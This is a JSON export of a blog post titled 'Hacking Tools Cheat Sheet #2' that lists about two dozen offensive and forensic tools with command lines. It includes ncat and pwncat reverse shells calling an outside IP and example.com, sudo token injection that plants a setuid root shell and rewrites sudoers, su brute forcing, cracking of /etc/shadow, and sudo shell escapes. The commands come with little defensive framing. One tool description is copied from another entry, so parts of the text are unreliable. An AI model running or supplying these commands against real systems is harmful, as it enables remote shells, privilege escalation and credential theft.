{"id":1635,"date":"2021-03-28T15:10:22","date_gmt":"2021-03-28T15:10:22","guid":{"rendered":"https:\/\/dft.wiki\/?p=1635"},"modified":"2022-06-23T17:10:55","modified_gmt":"2022-06-23T21:10:55","slug":"hacking-tools-cheat-sheet-2","status":"publish","type":"post","link":"https:\/\/dft.wiki\/?p=1635","title":{"rendered":"Hacking Tools Cheat Sheet #2"},"content":{"rendered":"
Reference List<\/h5>\n
    \n
  1. \n
      \n
    1. Tnmap<\/a><\/li>\n
    2. SearchSploit<\/a><\/li>\n
    3. suBruteForce<\/a><\/li>\n
    4. sudo_inject<\/a><\/li>\n
    5. Foremost<\/a><\/li>\n
    6. Zsteg<\/a><\/li>\n
    7. ExifTool<\/a><\/li>\n
    8. GDB<\/a><\/li>\n
    9. SublimeText<\/a><\/li>\n
    10. NCat<\/a><\/li>\n
    11. PwnCat<\/a><\/li>\n
    12. SeatBelt<\/a><\/li>\n
    13. GoBuster<\/a><\/li>\n
    14. SSHuttle<\/a><\/li>\n
    15. BloodHound<\/a><\/li>\n
    16. Evil-WinRM<\/a><\/li>\n
    17. Armitage<\/a><\/li>\n
    18. FrameBuffer<\/a><\/li>\n
    19. JohnTheRipper<\/a><\/li>\n
    20. ColabCat<\/a><\/li>\n
    21. SMBMap<\/a><\/li>\n
    22. enum4linux<\/a><\/li>\n
    23. ProxyChains<\/a><\/li>\n
    24. HashID<\/a><\/li>\n
    25. Axel<\/a><\/li>\n
    26. GettingShell<\/a><\/li>\n<\/ol>\n<\/li>\n<\/ol>\n
      \n

      Tnmap.py<\/strong> – This program breaks a big network into many small segments to enable parallel scans, multi-hosts task share, and more [Link<\/a>].<\/p>\n

      tnmap.py 10.0.0.0\/8<\/pre>\n
      \n
      SearchSploit<\/strong> – Simple way to search for vulnerabilities on a local copy of the exploit-db.com [Link<\/a>]. Other sources of vulns\/exploits at NIST Search Vulnerability Database [Link<\/a>], Mitre CVE [Link<\/a>], and CVE Program Mission [Link<\/a>].<\/p>\n
      sudo apt install exploitdb -y\r\nsearchsploit wordpress \r\nsudo -V | grep \"Sudo ver\" searchsploit \"sudo 1.9.5p1\"<\/pre>\n
      \n
      suBruteForce<\/strong> – Full throttle to get access as a specific user [Link<\/a>].<\/p>\n
      .\/suBF.sh -u username -w top12000.txt -t 0.7 -s 0.007<\/pre>\n
      \n
      sudo_inject<\/strong> – Injects process that have valid sudo token and activate our own sudo token [Link<\/a>].<\/p>\n
      Will create the binary activate_sudo_token in \/tmp. You can use it to activate the sudo token in your session:<\/p>\n
      bash exploit.sh\r\n\/tmp\/activate_sudo_token\r\nsudo su<\/pre>\n
      Will create a sh shell in \/tmp owned by root with setuid:<\/p>\n
      bash exploit_v2.sh\r\n\/tmp\/sh -p<\/pre>\n
      Will create a sudoers file that makes sudo tokens eternal and allows all users to use sudo:<\/p>\n
      bash exploit_v3.sh\r\nsudo su<\/pre>\n
      \n
      Foremost<\/strong> – A forensics tool to recover files based on headers and footers from disk or image file [Link<\/a>].<\/p>\n
      sudo apt install foremost\r\nforemost -t jpg,pdf<\/strong> -i image.dd<\/strong>\r\nforemost -t doc,xml<\/strong> -i \/dev\/sdb1<\/strong><\/pre>\n
      \n
      Zsteg<\/strong> – A Ruby application to detect and extract hidden data in image files [Link<\/a>].<\/p>\n
      sudo gem install zsteg\r\nzsteg image.png<\/pre>\n
      \n
      ExifTool<\/strong> – An application for reading and writing meta information in a wide variety of files [Link<\/a>]. Official website [Link<\/a>].<\/p>\n
      sudo apt install exiftool\r\nexiftool image.png\r\nexiftool -common image.jpg\r\nexiftool image.jpg | grep GPS\r\nexiftool -all= image.jpg<\/pre>\n
      \n
      GDB<\/strong> – The GNU Project debugger, allows one to see what is going on ‘inside’ a program while it executes or what a program was ‘doing’ at the moment it crashed [Link<\/a>]. Usually used with PEDA (Python Exploit Development Assistance for GDB), which colorizes and displays disassembly codes, registers, memory information during debugging, and adds extra commands [Link<\/a>].<\/p>\n
      sudo apt install gdb\r\ngdb executable\r\n(gdb) run<\/pre>\n
      \n
      SublimeText<\/strong> – A very sophisticated text editor for code and markup [Link<\/a>].<\/p>\n
      wget -qO - https:\/\/download.sublimetext.com\/sublimehq-pub.gpg | sudo apt-key add -\r\nsudo apt-get install apt-transport-https\r\necho \"deb https:\/\/download.sublimetext.com\/ apt\/stable\/\" | sudo tee \/etc\/apt\/sources.list.d\/sublime-text.list\r\nsudo apt-get update\r\nsudo apt-get install sublime-text\r\nsubl script.sh<\/pre>\n
      \n
      NCat<\/strong> – A NetCat version by NMAP that accepts SSL [Link<\/a>].<\/p>\n
      while true; do sudo ncat --ssl<\/strong> -lv 53 ; done\r\nwhile true; do ncat --ssl<\/strong> -v 174.88.217.186 53 -e \/bin\/bash<\/strong>; sleep 5 ; done\r\npython3 -c 'import pty; pty.spawn(\"\/bin\/bash\")<\/strong>'<\/pre>\n
      \n
      PwnCat<\/strong> – A sophisticated bind and reverse shell handler with many features as well as a drop-in replacement or compatible complement to netcat, ncat or socat [Link<\/a>].<\/p>\n
      pwncat -l -e<\/strong> '\/bin\/bash' 4444 -k<\/strong>\r\npwncat -e<\/strong> '\/bin\/bash' example.com 4444 --reconn --recon-wait 1<\/strong>\r\npwncat -e<\/strong> '\/bin\/bash' example.com 4444 -u --ping-intvl 1<\/strong><\/pre>\n
      The first example will keep listening (blind) even after disconnect.<\/p>\n
      The second and third are reverse and reconnect if Ctrl+C interrupts it but the third works over UDP.<\/p>\n
      \n
      SeatBelt<\/strong> – Performs a number of security-oriented host-survey safety checks [Link<\/a>].<\/p>\n
      Seatbelt.exe -group=all -full\r\nSeatbelt.exe -group=user\r\nSeatbelt.exe -group=system\r\nSeatbelt.exe -group=slack\r\nSeatbelt.exe -group=chromium\r\nSeatbelt.exe -group=chromium\r\nSeatbelt.exe -group=misc<\/pre>\n
      \n
      GoBuster<\/strong> – A tool to brute-force and discover directories, files, and subdomains [Link<\/a>]..<\/p>\n
      sudo apt install gobuster\r\ngobuster dir<\/strong> -e -t 50 -u<\/strong> http:\/\/example.com\/ -w<\/strong> \/usr\/share\/wordlists\/dirb\/common.txt\r\ngobuster dns -d<\/strong> example.com -w subdomains.txt --wildcard<\/pre>\n
      The first example uses -w<\/strong> to inform the wordlist file, -u<\/strong> to inform the URL or domain, -e<\/strong> for expanded mode, and -t<\/strong> define the number of threads.<\/p>\n
      On the second example, it looks for subdomains using dns -d<\/strong> and  –wildcard<\/strong> detects properly the existence of a wildcard (*.example.com).<\/p>\n
      \n
      SSHuttle<\/strong> – Creates a VPN over the SSH tunnel and allows pivoting into the network laterally [Link<\/a>]. It does not require any installation or root access on the host machine, just SSHuttle on the client is necessary. Note that ICMP (ping) does not work over this VPN.<\/p>\n
      sudo apt-get install sshuttle -y\r\nsshuttle -r<\/strong> user@host 10.0.0.0\/8\r\n<\/strong>sshuttle --dns -vvr <\/strong>user@host 0\/0<\/strong><\/pre>\n
      Use the argument -r<\/strong> to set the credentials to login into the host, followed by the network you want to reach over the VPN (192.168.0.0\/16<\/strong> in this example), –dns<\/strong> all the DNS requests will also be tunneled, and 0\/0<\/strong> informs that all the traffic must go through the VPN as well.<\/p>\n
      \n
      BloodHound<\/strong> – A GUI to reveal the hidden and often unintended relationships within an Active Directory environment. It can be used to easily gain a deeper understanding of privilege relationships between objects (like users and groups). [Link<\/a>].<\/p>\n
      Run the most recent version of the collector file on the PowerShell of a Windows machine that is connected to an Active Directory:<\/p>\n
      .\\AzureHound.ps1\r\n\r\nOR\r\n\r\n.\\SharpHound.exe<\/pre>\n
      Then transfer the output to the machine where the BloodHound will analyze it.<\/p>\n
      It can be installed using the official tutorial [Link<\/a>] or if you are using Kali just follow the commands:<\/p>\n
      sudo apt-get install bloodhound -y \r\nsudo neo4j console &\r\nbloodhound &<\/pre>\n
      Go to the page http:\/\/localhost:7474\/ and enter neo4j as user and password, then change them on the next page.<\/p>\n
      Use the credentials changed above to connect and import the acquired output files in to BloodHound.<\/p>\n
      \n
      Evil-WinRM<\/strong> – WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol [Link<\/a>]. This app gives a Remote Power Shell prompt. It can run locally or in a docker container.<\/p>\n
      evil-winrm -i<\/strong> 10.0.0.1 -u<\/strong> user -p<\/strong> password<\/pre>\n
      \n
      Armitage<\/strong> – A free GUI for Metasploit [Link<\/a>]. See also the licensed GUI for Metasploit called Cobalt Strike at [Link<\/a>].<\/p>\n
      sudo msfdb init\r\nsudo apt install armitage -y\r\nsudo armitage<\/pre>\n
      \n
      FrameBuffer<\/strong> – It is not a tool but a technique to capture the physical video output and export it to a file to be virtualized or stored. It needs the resolution information to make it visible later.<\/p>\n
      cat \/dev\/fb0<\/strong> > fb.raw\r\ncat \/sys\/class\/graphics\/fb0\/virtual_size<\/strong><\/pre>\n
      Now use GIMP to visualize the file.<\/p>\n
      \n
      JohnTheRipper<\/strong> – Tool for crashing hashes [Link<\/a>]. It is able to find out what kind of hash is being used and adjust the parameters for it automatically.<\/p>\n
      john single_password.txt\r\njohn -w:password.lst user:pass.lst\r\nsudo john \/etc\/passwd \/etc\/shadow<\/pre>\n
      58k English words list in upper and lower case [Link<\/a>].<\/p>\n
      Tools attached to John:<\/p>\n
      sudo unshadow<\/strong> \/etc\/passwd \/etc\/shadow > unshadow.txt\r\nunique<\/strong> -v -inp=allwords<\/strong>.lst uniques<\/strong>.lst<\/pre>\n
      \n
      ColabCat<\/strong> – Use Google Research Colab’s GPU resources to crack hashes with HashCat at [Link<\/a>] and follow the steps. It is also possible to run John there.<\/p>\n
      !bash\r\napt update\r\napt install john\r\necho \"b50ac41ec20631c7b6be72f070d8ff67\" > pass\r\ncat pass\r\njohn pass<\/pre>\n
      \n
      SMBMap<\/strong> – Lists share drives, permissions, shared contents, uploads\/downloads, and even executes remote commands [Link<\/a>].<\/p>\n
      smbmap -H 10.0.0.1 -R\r\nsmbmap -u user -p password -H host<\/pre>\n
      \n
      enum4linux<\/strong> – A combination of the Samba tools: smbclient, rpclient, net, and nmblookup used for enumeration [Link<\/a>].<\/p>\n
      enum4linux.pl -v<\/strong> 10.0.0.1\r\nenum4linux.pl -a<\/strong> 10.0.0.1\r\nenum4linux.pl -r<\/strong> 10.0.0.1\r\nenum4linux.pl -u user -p password -U<\/strong> 10.0.0.1<\/pre>\n
      \n
      ProxyChains<\/strong> – A combination of the Samba tools: smbclient, rpclient, net, and nmblookup used for enumeration [Link<\/a>].<\/p>\n
      proxychains<\/strong> nmap 10.0.0.1<\/pre>\n
      Edit the configuration file \/etc\/proxychains4.conf<\/strong> and customize if necessary:<\/p>\n
      dynamic_chain\r\n#strict_chain\r\nchain_len = 2\r\nproxy_dns\r\n[ProxyList]\r\n#socks5 127.0.0.1 9150          # would use Tor Network\r\nsocks4 200.200.200.200 9050     # a customized proxy\r\nsocks4 200.200.200.100 9050     # a customized proxy\r\nsocks4 200.200.100.100 9050     # a customized proxy\r\nsocks4 200.100.100.100 9050     # a customized proxy<\/pre>\n
      A good source of proxies can be found at [Link<\/a>].<\/p>\n
      In case you find the message “an existing sandbox was detected”<\/strong>\u00a0on the terminal, issue the following command:<\/p>\n
      sudo firecfg --clean<\/pre>\n
      \n
      HashID<\/strong> – Identifies the different types of hashes used to encrypt data and especially passwords [Link<\/a>]. See also a web tool for the same purpose called TunnelsUp\u00a0[Link<\/a>].<\/p>\n
      pip install hashid\r\nhashid -mj '$2y$10$EtzcwxcVdq7D40GIStLA2u4mxfZfUctoD.fufB7NdAJgjq3ACy2Di'\r\nhashid file.txt<\/pre>\n
      \n
      Axel<\/strong> – Axel is a multi thread Linux CLI download application [Link<\/a>]. It works as a download accelerator for commands line interface.<\/p>\n
      axel -a -n 6<\/strong> https:\/\/example.com\/file.gz<\/pre>\n
      Note: -a<\/strong> only shows the progress and -n 6<\/strong> defines the number of threads.<\/p>\n
      \n
      GettingShell<\/strong> – Is is not a tool but a small collection of unexpected ways to get root access or shell.<\/p>\n
      sudo awk 'BEGIN {system(\"\/bin\/sh\")}'\r\nsudo find \/etc -exec sh -i \\;<\/pre>\n
      Vim or Vi (command line text editor) or the application More (that used Vim) if run by root can get access to any file on the system and even start a shell:<\/p>\n
        \n
      • :e \/etc\/passwd<\/strong>\n
          \n
        • open the desired file as the running user<\/li>\n<\/ul>\n<\/li>\n
        • :sh<\/strong>\n
            \n
          • get a shell as the running user<\/li>\n<\/ul>\n<\/li>\n
          • :shell<\/strong>\n
              \n
            • get a shell as the running user<\/li>\n<\/ul>\n<\/li>\n
            • :set shell=\/bin\/bash<\/strong>\n
                \n
              • used to set a non-default shell if necessary<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n","protected":false},"excerpt":{"rendered":"
                Reference List Tnmap SearchSploit suBruteForce sudo_inject Foremost Zsteg ExifTool GDB SublimeText NCat PwnCat SeatBelt GoBuster […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[9],"tags":[],"class_list":["post-1635","post","type-post","status-publish","format-standard","hentry","category-hacking"],"_links":{"self":[{"href":"https:\/\/dft.wiki\/index.php?rest_route=\/wp\/v2\/posts\/1635","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/dft.wiki\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/dft.wiki\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/dft.wiki\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/dft.wiki\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1635"}],"version-history":[{"count":36,"href":"https:\/\/dft.wiki\/index.php?rest_route=\/wp\/v2\/posts\/1635\/revisions"}],"predecessor-version":[{"id":3045,"href":"https:\/\/dft.wiki\/index.php?rest_route=\/wp\/v2\/posts\/1635\/revisions\/3045"}],"wp:attachment":[{"href":"https:\/\/dft.wiki\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1635"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/dft.wiki\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1635"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/dft.wiki\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1635"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}